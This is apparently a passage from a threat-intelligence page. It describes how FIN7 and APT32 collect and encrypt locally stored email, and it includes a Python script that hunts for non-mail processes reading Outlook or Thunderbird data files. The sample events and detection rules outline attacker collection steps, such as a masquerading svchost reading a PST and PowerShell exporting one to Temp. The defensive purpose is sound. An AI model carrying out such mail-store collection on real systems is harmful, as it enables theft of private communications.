  • FIN7 (Carbanak Group): FIN7, also known as the Carbanak Group, is primarily financially motivated and targets retail, hospitality, and financial sectors. It uses the "Carbanak" backdoor to compromise systems and collect local email data: the backdoor accesses email clients, extracts stored messages and attachments, and archives and encrypts them. Email records containing transaction details and internal communications let FIN7 learn payment workflows and approval chains, which it then exploits in its fraud schemes. Targeting local email storage gives the group the comprehensive context it needs to make subsequent fraudulent actions look legitimate.

  • APT32 (OceanLotus): OceanLotus, a Vietnamese cyber-espionage group, targets government agencies and private sector organizations in Southeast Asia. Its malware targets local email clients such as Microsoft Outlook, extracting stored messages and attachments and compressing them into encrypted archives for exfiltration. This gives APT32 extensive communication data, including sensitive information from targeted individuals and organizations, and because the collection reads the local store it reaches historical mail as well as current traffic. Encryption and transmission over ordinary secure channels keep the archives from being inspected in transit.
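Every procedure in this section ends up opening the mail client's own data files, and the mail server sees none of it. The following Python example is added for this page and is not taken from any of the malware named above. It runs the endpoint-side hunt over constructed file-access events: it flags any process other than an allow-listed mail client touching Outlook PST/OST files or a Thunderbird profile, and adds weight when the process image sits in a user-writable directory or borrows a system process name outside System32, since that is where dropped tooling tends to live. The event format, hosts, users, paths and the allow-lists are invented for the example and would be tuned per environment.

```python
import ntpath
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List, Set

# Constructed file-access events (not real telemetry), one per line:
# time|host|user|process_image|access|file_path
SAMPLE_FILE_EVENTS = r"""
2024-03-05T08:01:10|WS-EXEC-01|corp\cchen|C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE|read|C:\Users\cchen\AppData\Local\Microsoft\Outlook\cchen@corp.example.ost
2024-03-05T08:03:45|WS-EXEC-01|corp\cchen|C:\Windows\System32\SearchProtocolHost.exe|read|C:\Users\cchen\AppData\Local\Microsoft\Outlook\cchen@corp.example.ost
2024-03-05T08:20:12|WS-EXEC-01|corp\cchen|C:\Users\cchen\AppData\Roaming\svchost.exe|read|C:\Users\cchen\Documents\Outlook Files\archive2021.pst
2024-03-05T08:22:02|WS-EXEC-01|corp\cchen|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|create|C:\Windows\Temp\export.pst
2024-03-05T09:10:00|WS-DEV-04|corp\rkumar|C:\Windows\System32\rundll32.exe|read|C:\Users\rkumar\AppData\Roaming\Thunderbird\Profiles\k3x9.default-release\ImapMail\imap.corp.example\INBOX
2024-03-05T09:12:00|WS-DEV-04|corp\rkumar|C:\Windows\explorer.exe|read|C:\Users\rkumar\Documents\roadmap.docx
"""

MAIL_CLIENTS: Set[str] = {"outlook.exe", "thunderbird.exe"}
# Processes that legitimately read mail stores in many estates (indexer, backup agents); tune locally.
BENIGN_READERS: Set[str] = {"searchprotocolhost.exe"}
# Names attackers reuse for dropped binaries; genuine copies live only under System32.
SYSTEM_NAMES: Set[str] = {"svchost.exe", "lsass.exe", "csrss.exe"}
SYSTEM32 = "c:\\windows\\system32\\"

OUTLOOK_STORE = re.compile(r"\.(?:pst|ost)$", re.I)
THUNDERBIRD_PROFILE = re.compile(r"\\thunderbird\\profiles\\", re.I)
USER_WRITABLE = re.compile(r"^(?:c:\\users\\|c:\\programdata\\|c:\\windows\\temp\\)|\\appdata\\", re.I)


@dataclass
class FileEvent:
    time: datetime
    host: str
    user: str
    image: str
    access: str
    path: str


@dataclass
class Finding:
    time: datetime
    host: str
    user: str
    severity: str
    reasons: List[str]


def parse_file_events(text: str) -> List[FileEvent]:
    events = []
    for line in text.strip().splitlines():
        t, host, user, image, access, path = line.split("|", 5)
        events.append(FileEvent(datetime.fromisoformat(t), host, user, image, access, path))
    return events


def is_mail_store(path: str) -> bool:
    """Outlook data files anywhere on disk, or anything inside a Thunderbird profile."""
    return bool(OUTLOOK_STORE.search(path) or THUNDERBIRD_PROFILE.search(path))


def hunt_mail_store_access(events: List[FileEvent], benign: Set[str] = BENIGN_READERS) -> List[Finding]:
    findings: List[Finding] = []
    for ev in events:
        if not is_mail_store(ev.path):
            continue
        proc = ntpath.basename(ev.image).lower()
        if proc in MAIL_CLIENTS or proc in benign:
            continue
        reasons = [f"{proc} ({ev.access}) touched mail store {ev.path}"]
        score = 1
        if USER_WRITABLE.search(ev.image):
            reasons.append("process image in user-writable directory")
            score += 1
        if proc in SYSTEM_NAMES and not ev.image.lower().startswith(SYSTEM32):
            reasons.append("system process name outside System32 (masquerading)")
            score += 1
        if ev.access == "create" and OUTLOOK_STORE.search(ev.path) \
                and "\\microsoft\\outlook\\" not in ev.path.lower():
            reasons.append("new PST/OST written outside the Outlook store directory")
            score += 1
        severity = "high" if score >= 3 else "medium" if score == 2 else "low"
        findings.append(Finding(ev.time, ev.host, ev.user, severity, reasons))
    return findings


if __name__ == "__main__":
    for f in hunt_mail_store_access(parse_file_events(SAMPLE_FILE_EVENTS)):
        print(f"{f.time:%H:%M:%S} {f.host} {f.user} [{f.severity}]")
        for r in f.reasons:
            print(f"    - {r}")
```

Outlook and the search indexer reading the OST are suppressed; the "svchost.exe" running from a Roaming profile that reads an archive PST scores high, PowerShell writing a fresh PST into C:\Windows\Temp scores medium (a typical export-before-exfiltration step), and rundll32 reading a Thunderbird INBOX is surfaced as low-severity for review. On Windows the corresponding source events are object-access auditing (4663) for reads and Sysmon FileCreate (Event ID 11) for the create case.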
